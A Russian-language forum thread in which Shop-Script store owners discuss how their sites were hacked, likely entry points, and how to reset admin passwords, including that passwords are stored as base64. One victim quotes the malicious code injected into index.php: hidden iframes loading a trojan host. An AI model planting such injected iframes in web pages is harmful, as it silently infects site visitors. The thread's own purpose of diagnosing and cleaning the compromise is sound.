Мне "поломали" магазин?

[alex31]

у меня была такая вещь... у меня стояла такая фишка, как оказалось с дырой. Скрипт Online help был дыряв...на форумах это и было описано... удалили его и усе номано...

 

[SSSonar]

у меня была такая вещь... у меня стояла такая фишка, как оказалось с дырой. Скрипт Online help был дыряв...на форумах это и было описано... удалили его и усе номано...

Alex, если не затруднит, а где ентот скрипт искать? Чего-то не могу найти

 

[EurekaVII]

А пароль можно и более простым способов во становить, через пхпмайадмин просто вставь на своем аккаунте рутовский пароль в кодировке мд5 и все.

 

[sounde]

Пароли в SS не в md5 а простая кодировка base64 вроде

 

[oraculseed]

относительно взлома
1. Если включен register_globals то пиши пропало в 99% случаев это и есть беда
2. Если он выключен но каким то макаром можно залить файл ... к примеру вместо картинки зальют пользовательский скрипт то все пиши пропало .htaccess можно то же дописать регистер глобалс
3. Если рассматривать вероятность локального взлома то это либо троян , либо слелс троян (например какая нить варезная прога на которую не матерится антивирус НО которая имеет доступ с сетевым интерфейсам что нибудь типа tcpdump или тот же netsetman)
4. Касаемо тотал коммандера то в моей практике это было не раз паоли воровались трояном открывался пул файлы автоматом правились . кароче из 100 файлов 20 зараженных причем в разных местах , лечится просто используйте нормальный антивирус
5. Если у вашего хостера кривые руки, и сервер в дырах , у меня на практике было взломали сервер и половину сайтов покоребили ... на что хостер развел руками
5. если вы во всем вышеперечисленном вы уверены то есть еще одна причина поменяйте пароли а фтп если есть шелл то и к нему тоже , рассморите вариант простого хищения пароля

 

[SSSonar]

А пароль можно и более простым способов во становить, через пхпмайадмин просто вставь на своем аккаунте рутовский пароль в кодировке мд5 и все.

да, я понимаю, что логин и пароль там лежит в шифрованном виде. А как вставить именно в кодировке мд5? Каким образом это делается?

 

[ModeX]

в phpmyadmin возле поля есть выпадающий список (колонка "Функция"), в этом поле выбери MD5 и при сохранении введённый текст будет закодирован.

 

[EurekaVII]

да, я понимаю, что логин и пароль там лежит в шифрованном виде. А как вставить именно в кодировке мд5? Каким образом это делается?

phpMyAdmin тебе в хелп, там все ето можно с легкостью провернуть.

 

[NeoGayver]

НАРОД вы вообще про что тут так мило беседу ведете! Какой на.. MD5 им без доработке в SS даже и не пахнет! Пасс через БД редиться тут - Таблица mg_customers - Поле cust_password! Пасс храниться в Base64!

 

[Poslannik]

На прошлой неделе было замечено, что мой сайт на SS Free не работает. Порылся в дримвьювере и вот что обнаружил.

КАК и КТО мог прописать в код index.php (и ещё в одном месте) в самом конце страницы???:


?><html><body><iframe src="http://betstarwager.cn/in.cgi?cocacola70" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://betstarwager.cn/in.cgi?cocacola64" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://betstarwager.cn/in.cgi?cocacola62" width=1 height=1 style="visibility: hidden"></iframe></body></html>


по ссылке не ходите, там троян!!!!

Эту хрень вычистил, но в админку не могу войти. Залил на сайт файл forgot_password.php. Обновил пароль и логин в админку. Один фиг. Если неправильно вводить, то предупреждает, что данные не верные. Если вводить прально, то тупо не входит и все...
Во блин))

1. Сначала где брал инсталяшку магазина. (Если покупал у когото то на 70% тебе туда засунули какой нибудь шелл).
2. Проверь в ручную все файлы из пипки конфигураций (там всегда есть что то интересное для хакеров)